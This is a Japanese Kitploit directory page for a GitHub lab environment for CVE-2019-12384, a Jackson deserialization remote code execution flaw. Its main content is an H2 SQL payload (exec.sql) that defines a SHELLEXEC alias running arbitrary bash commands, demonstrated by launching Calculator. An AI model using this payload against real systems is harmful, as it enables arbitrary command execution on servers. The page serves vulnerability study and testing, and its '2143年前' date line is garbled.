Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
Jackson_RCE-CVE-2019-12384 — CVE-2019-12384 脆弱性テスト環境 | Kitploit
ツール/GitHubGitHub/magiczer0/jackson_rce-cve-2019-12384
脆弱性分析コード分析エクスプロイトウェブアプリケーション悪用学習と教育
GitHubmagiczer0/jackson_rce-cve-2019-12384

Jackson_RCE-CVE-2019-12384

CVE-2019-12384 脆弱性テスト環境

リポジトリを見る
2143年前Kitploit レビュー済み

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

環境構築

プロジェクトをIDEAにインポートし、Mavenを設定した後に依存ライブラリの自動インポートを設定します。次に、ローカルのWeb空ディレクトリに以下のファイルを作成し、exec.sqlとして保存します。そしてhttpサーバーを起動します:

root@kitploit:~
CREATE ALIAS SHELLEXEC AS $$ String shellexec(String cmd) throws java.io.IOException {
    String[] command = {"/bin/bash", "-c", cmd};
    java.util.Scanner s = new java.util.Scanner(Runtime.getRuntime().exec(command).getInputStream()).useDelimiter("\0A");
    return s.hasNext() ? s.next() : "";  }
$$;
CALL SHELLEXEC('open /Applications/Calculator.app')

コード内の対応する部分を変更して、異なるオペレーティングシステム環境に適合させてください。

実行結果

電卓がポップアップ表示されるのを確認できます。

脆弱性リファレンス

https://blog.doyensec.com/2019/07/22/jackson-gadgets.html

https://mthbernardes.github.io/rce/2018/03/14/abusing-h2-database-alias.html

https://www.anquanke.com/post/id/182695

ツールをダウンロード